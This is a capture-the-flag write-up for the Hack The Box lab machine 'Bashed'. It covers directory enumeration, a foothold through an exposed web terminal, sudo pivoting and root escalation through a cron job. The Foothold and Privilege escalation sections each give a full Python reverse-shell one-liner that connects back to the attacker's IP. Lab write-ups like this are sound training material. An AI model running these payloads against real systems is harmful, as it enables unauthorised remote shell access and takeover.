https://app.hackthebox.com/machines/Bashed

---

Review

• Directory enumeration gives a browser based terminal for initial access.
• Run a python reverse shell to gain user access in Kali.
• Running SUDO permission without a password execute the user “scriptmanager” without specifying a password.
• The /scripts folder runs .py files as a cronjob as root.
• Create a python file with a reverse shell and root access will be gained.

---

Enumeration

Run nmap scan to find for open ports.

Port 80 shows us the following.

Run a gobuster scan to find for hidden dirrectories.

/dev/ gives us the following.

A browser based linux terminal.

The user arrexel has the user.txt file.

---

Foothold

Use a python reverse shell script to spawn a shell in kali.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.23",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Start a netcat listener .

sudo -l indicates we are able to use sudo on scriptmanager.

Spawn a python shell and and run sudo on scriptmanager.

Find the scripts folder.

To check if its a cron job , i tried removing the test.txt file but unable to do so. Rename the file and after some time a new test.txt file appears.

This machine seems to run .py files as a cron job and also done by root.

---

Privilege escalation

Let’s create a new python script with a reverse shell to our machine.

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.23",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > exploit.py

Root shell is gained.

The final flag is found.